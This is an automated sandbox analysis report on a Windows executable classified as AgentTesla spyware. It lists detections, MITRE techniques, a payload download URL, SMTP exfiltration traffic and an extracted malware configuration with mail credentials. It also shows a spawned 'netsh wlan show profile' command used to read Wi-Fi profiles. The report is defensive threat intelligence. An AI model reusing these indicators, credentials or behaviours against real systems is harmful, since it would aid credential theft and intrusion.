Loading ...

Play interactive tourEdit tour

Analysis Report bF7H5z6B1q.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:100782
Start date:22.04.2020
Start time:21:55:41
Joe Sandbox Product:Cloud
Overall analysis duration:0h 7m 8s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:bF7H5z6B1q.exe
Cookbook file name:default.jbs
Analysis system description:W10 x64 1809 Native physical Machine for testing VM-aware malware (Office 2016, Internet Explorer 11, Java 8u231, Adobe Reader DC 19)
Run name:Potential for more IOCs and behavior
Number of analysed new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.troj.spyw.evad.winEXE@7/0@1/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 67.8% (good quality ratio 55.4%)
  • Quality average: 66.5%
  • Quality standard deviation: 36%
HCA Information:
  • Successful, ratio: 92%
  • Number of executed functions: 204
  • Number of non-executed functions: 37
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): audiodg.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, LocalBridge.exe, backgroundTaskHost.exe
  • Excluded IPs from analysis (whitelisted): 92.122.188.25, 92.122.188.12, 93.184.221.240, 51.105.249.223
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, am3p.wns.notify.windows.com.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, wu.azureedge.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100Report FP / FNfalse
AgentTesla
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation111Winlogon Helper DLLAccess Token Manipulation1Disabling Security Tools11Credential Dumping2Virtualization/Sandbox Evasion13Remote File Copy1Email Collection1Data Encrypted1Standard Cryptographic Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaGraphical User Interface1Port MonitorsProcess Injection12Virtualization/Sandbox Evasion13Credentials in Registry1Process Discovery2Remote ServicesData from Local System2Exfiltration Over Other Network MediumUncommonly Used Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionAccess Token Manipulation1Input CaptureSecurity Software Discovery321Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationRemote File Copy1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingProcess Injection12Credentials in FilesRemote System Discovery1Logon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol2SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessObfuscated Files or Information1Account ManipulationSystem Information Discovery214Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol22Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceDLL Side-Loading1Brute ForceSystem Owner/User DiscoveryThird-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.binAvira URL Cloud: Label: malware
Found malware configurationShow sources
Source: RegAsm.exe.5096.10.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "=0A0jhVRt", "URL: ": "http://65WgO3Tt3vwSLEL.net", "To: ": "chimez2@originloger.com", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "DSMwV2T", "From: ": "chimez2@originloger.com"}
Multi AV Scanner detection for domain / URLShow sources
Source: http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.binVirustotal: Detection: 8%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: bF7H5z6B1q.exeVirustotal: Detection: 16%Perma Link

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.0.80:49768 -> 167.114.85.125:80
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.0.80:49771 -> 208.91.199.223:587
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 208.91.199.223 208.91.199.223
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses SMTP (mail sending)Show sources
Source: global trafficTCP traffic: 192.168.0.80:49771 -> 208.91.199.223:587
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /go/Jay_uncrypt_rZmowgNiLH235.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 167.114.85.125Cache-Control: no-cache
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknownTCP traffic detected without corresponding DNS query: 167.114.85.125
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /go/Jay_uncrypt_rZmowgNiLH235.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 167.114.85.125Cache-Control: no-cache
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: us2.smtp.mailhostbox.com
Urls found in memory or binary dataShow sources
Source: RegAsm.exeString found in binary or memory: http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.bin
Source: RegAsm.exe, 0000000A.00000002.16901282156.0000000001340000.00000004.00000020.sdmpString found in binary or memory: http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.binP
Source: RegAsm.exe, 0000000A.00000002.16911244616.0000000020033000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.16909949970.000000001FF28000.00000004.00000001.sdmpString found in binary or memory: http://65WgO3Tt3vwSLEL.net
Source: RegAsm.exe, 0000000A.00000002.16910783875.000000001FFF2000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: RegAsm.exe, 0000000A.00000002.16910783875.000000001FFF2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0A
Source: RegAsm.exe, 0000000A.00000002.16915141303.0000000022510000.00000002.00000001.sdmpString found in binary or memory: https://aka.ms/hcsadmin
Source: RegAsm.exe, 0000000A.00000002.16910783875.000000001FFF2000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000003.00000000.15658304569.0000000000415000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Potential malicious icon foundShow sources
Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
Contains functionality to call native functionsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112AD34 NtSetInformationThread,10_2_0112AD34
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112A8CD NtProtectVirtualMemory,10_2_0112A8CD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112039C EnumWindows,NtSetInformationThread,10_2_0112039C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112B11C NtSetInformationThread,10_2_0112B11C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112AD50 NtSetInformationThread,10_2_0112AD50
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01120548 NtSetInformationThread,10_2_01120548
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112B170 NtSetInformationThread,10_2_0112B170
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112AD94 NtSetInformationThread,10_2_0112AD94
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112B1BC NtSetInformationThread,10_2_0112B1BC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_011205A8 NtSetInformationThread,10_2_011205A8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112ADDC NtSetInformationThread,10_2_0112ADDC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112B025 NtSetInformationThread,10_2_0112B025
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112B074 NtSetInformationThread,10_2_0112B074
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_011204A6 NtSetInformationThread,10_2_011204A6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_011204A8 NtSetInformationThread,10_2_011204A8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112B0CC NtSetInformationThread,10_2_0112B0CC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_011204FD NtSetInformationThread,10_2_011204FD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112B321 NtSetInformationThread,10_2_0112B321
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112072C NtSetInformationThread,10_2_0112072C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112AF55 NtSetInformationThread,10_2_0112AF55
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112AF99 NtSetInformationThread,10_2_0112AF99
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112AFDD NtSetInformationThread,10_2_0112AFDD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112B21D NtSetInformationThread,10_2_0112B21D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112AE25 NtSetInformationThread,10_2_0112AE25
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01120644 NtSetInformationThread,10_2_01120644
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112AE74 NtSetInformationThread,10_2_0112AE74
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01120694 NtSetInformationThread,10_2_01120694
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112B284 NtSetInformationThread,10_2_0112B284
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112AEBC NtSetInformationThread,10_2_0112AEBC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112B2D0 NtSetInformationThread,10_2_0112B2D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1FD2B362 NtQuerySystemInformation,10_2_1FD2B362
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1FD2B331 NtQuerySystemInformation,10_2_1FD2B331
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeCode function: 3_2_004018FC3_2_004018FC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_222FF6E010_2_222FF6E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_222FE07010_2_222FE070
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_222F000610_2_222F0006
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_222FE88010_2_222FE880
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_222FF41A10_2_222FF41A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_222FE06A10_2_222FE06A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_222FECA410_2_222FECA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_222FE87010_2_222FE870
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_222FEFD910_2_222FEFD9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_222FED1610_2_222FED16
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_222FF6D110_2_222FF6D1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF1E4010_2_22CF1E40
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CFEFC010_2_22CFEFC0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF07E010_2_22CF07E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CFE78810_2_22CFE788
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF59D010_2_22CF59D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF3DE910_2_22CF3DE9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CFC98010_2_22CFC980
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF2EC410_2_22CF2EC4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CFCAC110_2_22CFCAC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CFCA7010_2_22CFCA70
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF6B5E10_2_22CF6B5E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CFA36010_2_22CFA360
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF330B10_2_22CF330B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF50D710_2_22CF50D7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CFC49A10_2_22CFC49A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF749010_2_22CF7490
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF1E4010_2_22CF1E40
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CFB07810_2_22CFB078
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CFA42710_2_22CFA427
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CFBC2010_2_22CFBC20
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF59C610_2_22CF59C6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF69F010_2_22CF69F0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF499010_2_22CF4990
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CFC97110_2_22CFC971
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF311310_2_22CF3113
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF392D10_2_22CF392D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE44F810_2_22DE44F8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE09E810_2_22DE09E8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE385010_2_22DE3850
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE1E4810_2_22DE1E48
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE064010_2_22DE0640
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE257810_2_22DE2578
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE0C0010_2_22DE0C00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE560110_2_22DE5601
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE013910_2_22DE0139
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE132010_2_22DE1320
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE09D810_2_22DE09D8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE44E910_2_22DE44E9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE4ABF10_2_22DE4ABF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE384010_2_22DE3840
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE131110_2_22DE1311
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE1E3910_2_22DE1E39
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE063310_2_22DE0633
PE file contains strange resourcesShow sources
Source: bF7H5z6B1q.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: bF7H5z6B1q.exe, 00000003.00000002.15791695388.0000000002190000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs bF7H5z6B1q.exe
Source: bF7H5z6B1q.exe, 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameOphic.exe vs bF7H5z6B1q.exe
Source: bF7H5z6B1q.exeBinary or memory string: OriginalFilenameOphic.exe vs bF7H5z6B1q.exe
Tries to load missing DLLsShow sources
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeSection loaded: vb6zz.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: security.dllJump to behavior
Yara signature matchShow sources
Source: 00000003.00000000.15658304569.0000000000415000.00000020.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000000.15658304569.0000000000415000.00000020.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@7/0@1/2
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1FD2B1E6 AdjustTokenPrivileges,10_2_1FD2B1E6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1FD2B1AF AdjustTokenPrivileges,10_2_1FD2B1AF
Creates mutexesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_02
PE file has an executable .text section and no other executable sectionShow sources
Source: bF7H5z6B1q.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)Show sources
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9fbf7494605b6eb9632b0c9bfc1683d9\mscorlib.ni.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Reads software policiesShow sources
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: bF7H5z6B1q.exeVirustotal: Detection: 16%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\bF7H5z6B1q.exe 'C:\Users\user\Desktop\bF7H5z6B1q.exe'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\bF7H5z6B1q.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
